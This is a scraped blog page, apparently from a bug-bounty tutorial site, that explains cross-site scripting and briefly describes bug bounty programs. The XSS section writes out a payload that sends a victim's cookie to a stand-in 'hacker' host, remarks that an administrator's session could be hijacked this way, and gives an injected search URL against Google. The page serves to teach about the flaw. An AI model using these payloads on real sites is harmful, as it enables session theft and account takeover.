<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-w_MEtWjp-mGlWUFY-v0k5zrTav5AP-mhBygfYN9Ms8qoxv7DHabpzwf1F0zc85VJi9VqyDaWhQ-LbTGDwkU0wwEV5HXUepBsJEW2rYVr8Yg61e4u0osiPunbMFkmwI6ocBvEVSIMVq5g/s1600/reflected+xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-w_MEtWjp-mGlWUFY-v0k5zrTav5AP-mhBygfYN9Ms8qoxv7DHabpzwf1F0zc85VJi9VqyDaWhQ-LbTGDwkU0wwEV5HXUepBsJEW2rYVr8Yg61e4u0osiPunbMFkmwI6ocBvEVSIMVq5g/s320/reflected+xss.PNG" width="320" /></a></div>
<div class="separator" style="clear: both;">
Persistent XSS</div>
<div class="separator" style="clear: both;">
Consider a Web application that allows users to enter a user name which is displayed on each user’s profile page. The application stores each user name in a local database. A malicious user notices that the Web application fails to sanitize the user name field and inputs malicious JavaScript code as part of their user name. When other users view the attacker’s profile page, the malicious code automatically executes in the context of their session.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfz6pl1WwyIDVBV3Go27PV9AjBisDEASf5Sdo19nsIpxfIkH-ZeF8hFoyoks9D8vXFN22FlXmY5zGa8VlL0VaU8GIOfdumRwfx1mfmaqbZj86KnmUauR60gORQavIbpg5pTTMtQ_-LGETi/s1600/persistent+xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfz6pl1WwyIDVBV3Go27PV9AjBisDEASf5Sdo19nsIpxfIkH-ZeF8hFoyoks9D8vXFN22FlXmY5zGa8VlL0VaU8GIOfdumRwfx1mfmaqbZj86KnmUauR60gORQavIbpg5pTTMtQ_-LGETi/s320/persistent+xss.PNG" width="320" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both;">
Impact of Cross-Site Scripting</div>
<div class="separator" style="clear: both;">
When attackers succeed in exploiting XSS vulnerabilities, they can gain access to account credentials. They can also spread Web worms or access the user’s computer and view the user’s browser history or control the browser remotely. After gaining control to the victim’s system, attackers can also analyze and use other intranet applications.</div>
<div class="separator" style="clear: both;">
By exploiting XSS vulnerabilities, an attacker can perform malicious actions, such as:</div>
<div class="separator" style="clear: both;">
Hijack an account.</div>
<div class="separator" style="clear: both;">
Spread Web worms.</div>
<div class="separator" style="clear: both;">
Access browser history and clipboard contents.</div>
<div class="separator" style="clear: both;">
Control the browser remotely.</div>
<div class="separator" style="clear: both;">
Scan and exploit intranet appliances and applications.</div>
<div class="separator" style="clear: both;">
Identifying Cross-Site Scripting Vulnerabilities</div>
<div class="separator" style="clear: both;">
XSS vulnerabilities may occur if:</div>
<div class="separator" style="clear: both;">
Input coming into Web applications is not validated</div>
<div class="separator" style="clear: both;">
Output to the browser is not HTML encoded</div>
<div class="separator" style="clear: both;">
XSS Examples</div>
<div class="separator" style="clear: both;">
Example 1.</div>
<div class="separator" style="clear: both;">
For example, the HTML snippet:</div>
<div class="separator" style="clear: both;">
<title>Example document: %(title)</title></div>
<div class="separator" style="clear: both;">
is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:</div>
<div class="separator" style="clear: both;">
<title>Example document: XSS Doc</title></div>
<div class="separator" style="clear: both;">
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:</div>
<div class="separator" style="clear: both;">
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT></div>
<div class="separator" style="clear: both;">
Sitting on the other end, at the Webserver, you will be receiving hits where after a double space is the users cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their sessionID and hijack the session.</div>
<div class="separator" style="clear: both;">
Example 2.</div>
<div class="separator" style="clear: both;">
Suppose there's a URL on Google's site, http://www.google.com/search?q=flowers, which returns HTML documents containing the fragment</div>
<div class="separator" style="clear: both;">
<p>Your search for 'flowers' returned the following results:</p></div>
<div class="separator" style="clear: both;">
i.e., the value of the query parameter q is inserted into the page returned by Google. Suppose further that the data is not validated, filtered or escaped. </div>
<div class="separator" style="clear: both;">
Evil.org could put up a page that causes the following URL to be loaded in the browser (e.g., in an invisible<iframe>):</div>
<div class="separator" style="clear: both;">
http://www.google.com/search?q=flowers+%3Cscript%3Eevil_script()%3C/script%3E</div>
<div class="separator" style="clear: both;">
When a victim loads this page from www.evil.org, the browser will load the iframe from the URL above. The document loaded into the iframe will now contain the fragment</div>
<div class="separator" style="clear: both;">
<p>Your search for 'flowers <script>evil_script()</script>'</div>
<div class="separator" style="clear: both;">
returned the following results:</p></div>
<div class="separator" style="clear: both;">
Loading this page will cause the browser to execute evil_script(). Furthermore, this script will execute in the context of a page loaded from www.google.com!</div>
<div>
<br /></div>
<div>
<br /></div>
</div>

Cross Site Scripting

Introduction Cross-Site Scripting stems from a lack of encoding when information gets sent to application's users. This can be used to inject arbitrary HTML and JavaScript; the result being that this…

03 Jun 2015

Bug bounty program

<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.2000007629395px; margin-bottom: 20px;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaf4aKov2ewk6UAiWXF92foDifRbYx0ncWmvP25iSXsQXr65WPIAdZPjpnW-w2Kg84SV6CcnGxL4ar_X1FiruACADzbtiKKnd-LE2dcYTy8cOSC2WS-FkSXuSjKYb1TQY13JxFuffvp-nO/s1600/bug-bounty.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaf4aKov2ewk6UAiWXF92foDifRbYx0ncWmvP25iSXsQXr65WPIAdZPjpnW-w2Kg84SV6CcnGxL4ar_X1FiruACADzbtiKKnd-LE2dcYTy8cOSC2WS-FkSXuSjKYb1TQY13JxFuffvp-nO/s320/bug-bounty.jpg" width="320" /></a></div>
A bug bounty program, also called a hacker bounty program or vulnerability rewards program, is that rewards individuals for finding a software bug and reporting it to the organization offering a reward.</div>
<div style="background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.2000007629395px; margin-bottom: 20px;">
<span style="line-height: 19.2000007629395px;">Many software</span><span style="line-height: 19.2000007629395px;"> </span><span style="line-height: 19.2000007629395px;">vendors</span><span style="line-height: 19.2000007629395px;"> </span><span style="line-height: 19.2000007629395px;">and web sites run bug bounty programs, often paying out cash rewards to software security researchers and</span><span style="line-height: 19.2000007629395px;"> </span>white hat<span style="line-height: 19.2000007629395px;"> </span><span style="line-height: 19.2000007629395px;">hackers for discovering and reporting software vulnerabilities that could be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Bug bounty programs are often initiated to supplement internal code audits and</span><span style="line-height: 19.2000007629395px;"> </span>penetration tests<span style="line-height: 19.2000007629395px;"> </span><span style="line-height: 19.2000007629395px;">as part of a</span><span style="line-height: 19.2000007629395px;"> </span>vulnerability management<span style="line-height: 19.2000007629395px;"> </span><span style="line-height: 19.2000007629395px;">strategy.</span></div>
<div style="background-color: white; font-family: Calibri, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 19.2000007629395px; margin-bottom: 20px;">
Most companies offer bounties on a sliding scale based on the size of the organization and how much impact on users a bug might have. For example, Mozilla pays out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and in one of the biggest recent bounties, Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.</div>
</div>

Bug bounty program

A bug bounty program, also called a hacker bounty program or vulnerability rewards program, is that rewards individuals for finding a software bug and reporting it to the organization offering a rewa…

02 Jun 2015

Bug Bounty Reports

Clickjacking Test Page

Getting Started in Bug bounties

PGP Email Encryption Using Mailvelope

Lack of SPF leads to Email Spoofing

XSS in Referrer Header

Testing for Password Reset token validation

Burp Suite tutorial

Session fixation Attack

Cross Site Request Forgery

List of Bug Bounty Programs

Cross Site Scripting

Bug bounty program

Popular Posts

Recent